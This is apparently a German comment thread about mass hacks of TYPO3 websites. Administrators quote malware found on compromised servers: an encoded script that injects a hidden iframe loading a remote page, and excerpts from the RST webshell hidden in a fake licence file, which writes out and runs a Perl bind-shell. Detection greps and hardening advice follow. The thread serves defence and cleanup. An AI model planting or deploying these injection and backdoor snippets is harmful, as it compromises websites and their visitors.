Auf der einen Seite ist es in Ordnung, dass durch diese massenhaften Hacks die Sicherheit weiter in den Vordergrund gestellt wird und somit System weiteren, meist intensiveren Audits unterzogen werden.

In der Summe entsteht aber vorerst nur ein Schaden und durch die extreme Variation in den Verschleierungstechniken, ist hier wohl auch noch kein Ende in Sicht.

Hoffen wir mal das Beste.

habe eben noch folgende Version gefunden:

error_reporting(0);for($i=0,$s='';$ieval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%30%78%63%62%64%66%39%66%36%39%2F%6C%69%62%72%61%72%69%65%73%2F%69%66%72%61%6D%65%2E%70%68%70%3F%75%3D%61%31%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'));

rst.void.ru
security-teams.net

Danke an Martin für das (per PM geschickte) jüngste Beispiel einer weiteren RST-Webshell…

find . -name “*” -exec grep SUCH_STRING ‘{}’ \; -exec ls -lha ‘{}’ \;

Aufspüren kann man die Programme via:

grep -r “call_user_func(’syst” *

und

grep -r “/tmp/bd”

Ach eins noch: Bei den betroffenen Webs sollte man unbedingt prüfen, ob register_globals auf off steht.

Hi,
auf typo3.org gibt es inzwischen eine Zusammenfassung der Erkenntnisse des TYPO3 Security Team zu diesen Angriffen, n……

aus dem localconf.php

aus dem licence.php ein paar auszuege:

function start_session(){
if ($_SERVER['HTTP_USER_AGENT'] != elesif(‘E29iM2kyLz90YmVhZFNbVTu0qUN6Yl93q3phM29iM2kyLz90YzAioF9vo3Dhp2u0oJjc’)){
$license = ‘GNU GENERAL PUBLIC LICENSE
…
…
…
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']==”Perl”))
{
cf(“/tmp/bdpl”,$port_bind_bd_pl);
$p2=which(“perl”);
$blah = ex($p2.” /tmp/bdpl “.$_POST['port'].” &”);
$_POST['cmd']=”ps -aux | grep bdpl”;
}
…
…
…
else if(($_POST['cmd']!=”php_eval”)&&($_POST['cmd']!=”mysql_dump”)&&($_POST['cmd']!=”db_query”)&&($_POST['cmd']!=”ftp_brute”))

das audit_log von mod_sec hat ueber 5 megabyte pro tag.
das errorlog hat ueber 4.3 gigabyte per monat, und alleine das web, das am meisten attackiert wird erzeugt 127 gigabyte traffic pro monat (und das ist keine streaming media page…), bei den dimensionen ist es nur ne frage der zeit, bis angriffe greifen.

dann werden auch diverse xss staendig ausprobiert, fuer shop systeme, und fuer registrierungsseiten. (sr_feuser…, tt_products, tt_news…)

worauf man auch achten sollte: php safe_mode, den haben die typo3 devs gerne abgeschalten, weil da so viel mehr geht … (awstats…) sofort einschalten, damit vermeidet man u.a., dass so schoene sachen wie n wordpress, n cpanel oder n phpmyadmin dem eigenen typo3 web zum verhängniss werden… (wir hatten mind. einmal n erfolgreichen ueber ne alte wordpress version…)

mit safe_mode funktioniert zwar cc_awstats nicht mehr, allerdings gibt ics_awstats da einen sehr guten ersatz, der auch mit safe_mode funktioniert.

gefunden hab ich das php backdoor uebrigens mit dem clamav, der zeigts einem an… (zumindest hat ers in meinem fall getan), also mal n clamscan ueber das webroot laufen lassen…